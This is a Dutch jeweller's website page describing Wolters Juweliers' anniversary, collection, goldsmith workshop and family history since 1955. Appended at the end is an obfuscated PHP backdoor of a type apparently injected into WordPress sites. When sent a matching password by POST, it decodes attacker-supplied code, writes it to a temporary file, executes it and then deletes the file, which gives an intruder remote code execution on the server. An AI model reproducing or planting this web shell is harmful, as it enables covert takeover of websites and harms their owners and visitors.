Over Wolters Juweliers

Wolters Juweliers bestaat dit jaar 2020 65 jaar als juweliersbedrijf. Dit willen we niet ongemerkt voorbij laten gaan. Daarom ziet u het hele jaar tot zelfs 15 januari 2021 het jubileumlogo.
Op 15 januari 2020 houden we een gezellige inloopdag voor onze klanten in Coevorden en na 16.00 uur voor genodigden.
We plannen het hele jaar door aantrekkelijke aanbiedingen waar u nog van gaat horen en zien.

Wolters Juweliers Coevorden Emmen is een echt familiebedrijf, sinds 1955 gevestigd in Coevorden en sinds 1986 in Emmen in een VOF vorm. De drie kinderen hebben het levenswerk van vader ( uurwerkmaker in eerste instantie) en moeder ( Geen vakkennis, maar zeer mensgericht , mensenmens zou je nu zeggen) voortgezet in een moderne vorm, maar wel geïnspireerd op vakmanschap. Aart, Gert en Tjardi voeren dit bedrijf nu.

ONZE UITGEBREIDE COLLECTIE
Naast een uitgebreide collectie goud en briljant heeft Wolters Juweliers een uitgebreide zilver- en horlogecollectie in huis. Bij Wolters Juweliers zijn echte vakmensen aan het werk. Trouwringen ontwerpen en uitkiezen met de klant is één van onze passies. Ook zijn we trots op het Zwitserse merk Ebel watches , een hoogstandje als het gaat om Zwitserse precisie horloges, ons topmerk. Kom langs in onze winkels, we laten u graag alles zien.

Als u denkt dat het een beetje meer tijd kost voor uw wens dan mag u een afspraak maken en dan maken wij tijd voor u! Wij zijn te bereiken via tel:0524-512477 Coevorden of stuur een bericht via ons contactformulier.

ONS ATELIER MET VAKMENSEN

Er zijn twee eigen goudsmeden in het atelier aanwezig, waardoor uw sieraden en horloges met echte vakkennis in behandeling worden genomen. Ook is het mogelijk om uw eigen ontwerp kan bij ons te laten uitwerken. We `verbouwen` graag trouwringen naar een ander model. We denken graag met u mee bij gedenksieraden, het verwerken van uw sieraden na overlijden van uw partner, moeder of vader.

HISTORIE VAN WOLTERS JUWELIERS

In 1955 besloot Johannes Wolters, voor vrienden Max, om in Coevorden een winkel te beginnen in de horlogerie. Hij was bekwaam horloge- en klokkenmaker, opgeleid aan de technische school in Almelo. Na een aantal jaren in dienst te zijn geweest als reparateur in 's Heerenberg, besloot hij toch zelf maar eens te beginnen.

Emmen was te klein voor de juwelier
Na een zoektocht in onder andere Emmen en Zwolle, koos hij toch voor Coevorden. Emmen was toen te klein....
Hes Wolters was zijn vriendin en hielp hem mee de zaak in te richten en ging in de winkel staan. Omdat ze niet getrouwd waren moest Hes elke dag met de trein terug naar haar ouderlijk huis in Vriezenveen, dus werd er in dat jaar netjes getrouwd. Ze kregen drie kinderen, resp. Aart, Tjardi en Gert.

Juwelier in een noodkeet
De zaken gingen langzaam steeds beter en in 1970 werd het oude pand gesloopt en een modern pand opgebouwd. De tijdelijke noodkeet stond een half jaar op de markt!

Zo rond 1979 besloot Tjardi een goudsmids opleiding te gaan doen en ging in de winkel staan. Nieuw bloed en meer kennis omtrent goudsmeden en sieraden ontwikkelde zich. Rond 1984 besloot ook Aart na een studie middelbare detailhandelschool en HEAO de zaak in te gaan, om meer structuur te bieden in de organisatie. Gert was na de MAVO naar de goud en zilversmeden opleiding in Schoonhoven gegaan en ging na zijn studie werken bij verschillende juweliers en goudsmeden. Omstreeks 1987, kwam Gert zaak en nam de reparaties gedeeltelijk over van Tjardi. Uiteindelijk "bestuurt" Gert sinds 1987 onze zaak in Emmen. Vandaar Wolters Juweliers Coevorden Emmen.

Twee winkels
In 1986 was Ma Wolters degene die er in Emmen even een zaak bij kocht, in de Minister Kanstraat. Gert Wolters heeft daar nu al 30 jaar de bezielende leiding. Aart en Tjardi "doen "de zaak in Coevorden, Tjardi de dagelijkse verkoop en Aart de administratie and whatsoever voor Emmen en Coevorden, naast verkoop.

Wolters Juweliers Coevorden Emmen

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}